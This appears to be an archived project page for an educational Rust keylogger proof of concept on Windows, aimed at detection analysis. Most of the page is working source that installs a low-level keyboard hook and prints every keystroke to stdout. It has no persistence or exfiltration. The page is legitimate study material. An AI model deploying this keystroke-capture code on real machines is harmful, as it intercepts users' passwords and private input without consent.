EXPERIMENT_ID: 001

Rust Keylogger PoC

ARCHIVED

A Windows-based keylogger demonstrating the usage of SetWindowsHookEx and proper hook chaining for educational detection analysis.

OBJECTIVE

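Understand how Windows messaging hooks can be abused for credential interception and how EDRs detect hook injection. Note that a WH_KEYBOARD_LL hook, as used here, is not injected into other processes: the callback runs in the thread that installed it, so detection for this sample centres on the SetWindowsHookEx call itself rather than on a foreign module being loaded.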

CONSTRAINTS

Educational purpose only. Does not persist across reboots. Logs to stdout only.

Rust WinAPI Unsafe
src/main.rs
1use std::ptr;
2use winapi::shared::minwindef::{LPARAM, LRESULT, WPARAM};
3use winapi::shared::windef::HHOOK;
4use winapi::um::winuser::{
5 CallNextHookEx, DispatchMessageW, GetMessageW, SetWindowsHookExW,
6 TranslateMessage, UnhookWindowsHookEx, WH_KEYBOARD_LL, KBDLLHOOKSTRUCT,
7};
8
/// Handle of the installed keyboard hook; null until `main` stores the value
/// returned by `SetWindowsHookExW`. Written once in `main`, then read by
/// `keyboard_proc` (for `CallNextHookEx`) and by `main` again when unhooking.
static mut HOOK: HHOOK = ptr::null_mut();
10
/// Hook procedure registered for `WH_KEYBOARD_LL` in `main`.
///
/// When `n_code` is non-negative and the message is a key-down, prints the
/// virtual-key code and scan code of the event to stdout. Every call, logged or
/// not, is forwarded to the next hook in the chain and that hook's result is
/// returned, so the event still reaches other hooks.
///
/// # Safety
///
/// Intended to be invoked only by Windows as a low-level keyboard hook
/// procedure: whenever `n_code >= 0`, `l_param` must point to a valid
/// `KBDLLHOOKSTRUCT` for the duration of the call.
unsafe extern "system" fn keyboard_proc(
    n_code: i32,
    w_param: WPARAM,
    l_param: LPARAM,
) -> LRESULT {
    // Message identifier compared against `w_param` (WM_KEYDOWN).
    const KEY_DOWN_MESSAGE: u32 = 0x0100;

    // Only key-down events are reported; key-up and other messages fall
    // through to the chain untouched.
    let is_key_down = n_code >= 0 && w_param as u32 == KEY_DOWN_MESSAGE;
    if is_key_down {
        // SAFETY: for a WH_KEYBOARD_LL hook with a non-negative code, Windows
        // passes a pointer to a KBDLLHOOKSTRUCT in `l_param`.
        let event = &*(l_param as *const KBDLLHOOKSTRUCT);
        println!("[KEY] vkCode={:03} scanCode={:#06x}", event.vkCode, event.scanCode);
    }

    // Always hand the event on so the rest of the hook chain keeps working.
    CallNextHookEx(HOOK, n_code, w_param, l_param)
}
25
/// Installs the low-level keyboard hook, pumps this thread's message queue
/// until `GetMessageW` stops returning a positive value, then removes the hook.
///
/// The hook is registered with a null module handle and thread id 0. The
/// `SetWindowsHookExW` call with `WH_KEYBOARD_LL` is the API-level event in
/// this sample that endpoint monitoring can observe.
///
/// # Panics
///
/// Panics with "Failed to install hook" if `SetWindowsHookExW` returns null.
fn main() {
    unsafe {
        let installed = SetWindowsHookExW(WH_KEYBOARD_LL, Some(keyboard_proc), ptr::null_mut(), 0);
        HOOK = installed;
        assert!(!HOOK.is_null(), "Failed to install hook");

        // Low-level hook callbacks are delivered through the installing
        // thread's message loop, so the process has to keep pumping messages.
        let mut msg = std::mem::zeroed();
        loop {
            // 0 means WM_QUIT, a negative value means an error; both end the loop.
            if GetMessageW(&mut msg, ptr::null_mut(), 0, 0) <= 0 {
                break;
            }
            TranslateMessage(&msg);
            DispatchMessageW(&msg);
        }

        UnhookWindowsHookEx(HOOK);
    }
}